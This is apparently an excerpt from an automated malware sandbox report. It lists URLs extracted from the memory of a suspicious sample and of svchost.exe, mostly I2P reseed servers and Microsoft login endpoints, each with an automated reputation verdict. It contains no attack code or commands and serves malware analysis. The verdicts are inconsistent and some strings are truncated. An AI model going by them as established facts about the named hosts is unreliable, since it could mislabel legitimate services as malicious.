0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reseed-fr.i2pd.xyz/p | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reseed.stormycloud.org/b.c | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA | svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds | svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf | svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reseed.i2pgit.org/i2pseeds.su3 | main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502 | svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reseed.i2pgit.org:443/i2pseeds.su3 | main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://banana.incognet.io/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
http://Passport.NET/tb_ | svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.live | svchost.exe, 0000001F.00000002.3262816840.000001D378B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://reseed-pl.i2pd.xyz/i2pseeds.su30 | main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt | update.pkg.11.dr | false | Avira URL Cloud: safe | unknown
https://reseed-fr.i2pd.xyz/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
https://i2p.novg.net/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
https://reseed.i2pgit.org/P# | main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://account.live.com/msangcwam | svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023950758.000001D379357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://i2p.ghativega.in/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
http://passport.net/tb | svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263392705.000001D379813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/ | main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www2.mk16.de/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
http://reg.i2p/hosts.txt | update.pkg.11.dr | false | Avira URL Cloud: safe | unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P# | main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds | svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reseed.onion.im/i2pseeds.su3 | main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://identiguy.i2p/hosts.txt | shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.dr | false | Avira URL Cloud: safe | unknown
https://reseed.memcpy.io/hP# | main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reseed.diva.exchange/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/ | shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.dr | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes | svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee | svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reseed.stormycloud.org/ | main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | true | Avira URL Cloud: safe | unknown
https://i2pseed.creativecowpat.net:8443/G | main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns: | svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID | svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf | svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA | svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf | svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                    http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111952207.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111425069.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/09/policysrfsvchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/scnsvchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://reseed.i2pgit.org/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i2p.novg.net/:main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfUsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://Passport.NET/STSsvchost.exe, 0000001F.00000003.3199473486.000001D37989B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D379382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reseed-pl.i2pd.xyz:443/i2pseeds.su3Tmain.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reseed-pl.i2pd.xyz/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://stats.i2p/cgi-bin/newhosts.txtshdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://127.0.0.1:8118shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2456738676.0000022350291000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456860774.0000022350297000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reseed.onion.im/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2p.mooo.com/netDb/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reseed2.i2p.net/main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://Passport.NET/tbsvchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3209006685.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reseed.stormycloud.org/??main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262754497.000001D378AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000001F.00000003.3183713515.000001D379377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reseed.i2pgit.org/i2pseeds.su30main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://signup.live.com/signup.aspxsvchost.exe, 0000001F.00000003.3023799636.000001D379355000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reseed.stormycloud.org/7main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reseed.i2p-projekt.de/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://netdb.i2p2.no/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfUsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www2.mk16.de/Jmain.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reseed-pl.i2pd.xyz/i2pseeds.su3main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://reg.i2p/hosts.txt9main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://legit-website.com/i2pseeds.su3shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                                            • Avira URL Cloud: safe
